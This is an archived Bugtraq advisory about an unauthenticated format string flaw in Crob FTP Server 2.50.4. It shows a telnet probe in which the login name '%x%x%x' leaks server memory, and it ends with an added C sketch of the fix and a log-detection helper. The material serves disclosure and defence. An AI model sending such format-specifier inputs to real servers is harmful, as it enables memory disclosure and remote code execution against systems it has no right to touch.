[30331] in bugtraq


Format String Vulnerability in Crob Ftp Server

daemon@ATHENA.MIT.EDU (Luca Ercoli)
Mon Jun 2 13:16:29 2003

Date: 2 Jun 2003 16:55:10 -0000
Message-ID: <20030602165510.27776.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Luca Ercoli <luca.ercoli@inwind.it>
To: bugtraq@securityfocus.com



Package:        Crob Ftp Server
Auth:		Crob Software Studio (www.crob.net/studio/ftpserver/)
Version: 	2.50.4 Build 228
Vulnerability:  Format String
Risk: 	        High


Vulnerability Description:

A format string flaw in the authentication process allows remote attackers 
without valid user/pass to execute arbitrary code.


C:\>telnet 192.168.0.1 21

220- Crob FTP Server V2.50.4
220  Welcome to Crob FTP Server

user %x%x%x

331 Password required for 0d1250b70







Luca Ercoli luca.ercoli[at]inwind.it
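
Added example, not part of the original post and not Crob's code: a C sketch of the bug class behind the session above, with the hardened way to build the 331 reply and a log check for conversion specifiers in a USER argument. The function names and the reply wording beyond what the transcript shows are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical reply builder; Crob's real source is not on the page.
 * The flawed pattern this bug class comes from looks like:
 *     snprintf(tmp, sizeof tmp, "331 Password required for %s", user);
 *     snprintf(out, outlen, tmp);   // tmp holds client bytes, used as format
 * The fix: client bytes are only ever an argument, never the format. */
int build_user_reply(char *out, size_t outlen, const char *user)
{
    int n = snprintf(out, outlen, "331 Password required for %s\r\n", user);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;   /* -1 on truncation */
}

/* Detection helper for FTP logs: count printf-style conversion
 * specifiers in a USER argument. "%%" is a literal percent sign. */
int count_format_specifiers(const char *s)
{
    int count = 0;
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (s[i] != '%')
            continue;
        if (s[i + 1] == '%') { i++; continue; }
        /* skip flags, width, precision and length modifiers */
        size_t j = i + 1;
        while (s[j] != '\0' && strchr("-+ #0123456789.*hlLqjzt", s[j]))
            j++;
        if (s[j] != '\0' && strchr("diouxXeEfgGaAcspn", s[j])) {
            count++;
            i = j;
        }
    }
    return count;
}

int main(void)
{
    char reply[128];
    const char *user = "%x%x%x";   /* the USER argument from the advisory */
    if (build_user_reply(reply, sizeof reply, user) > 0)
        fputs(reply, stdout);      /* echoes the name verbatim */
    printf("specifiers: %d\n", count_format_specifiers(user));
    return 0;
}
```

A patched server would answer the request above with the literal text "%x%x%x" in the 331 line rather than hex values read from its own memory.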
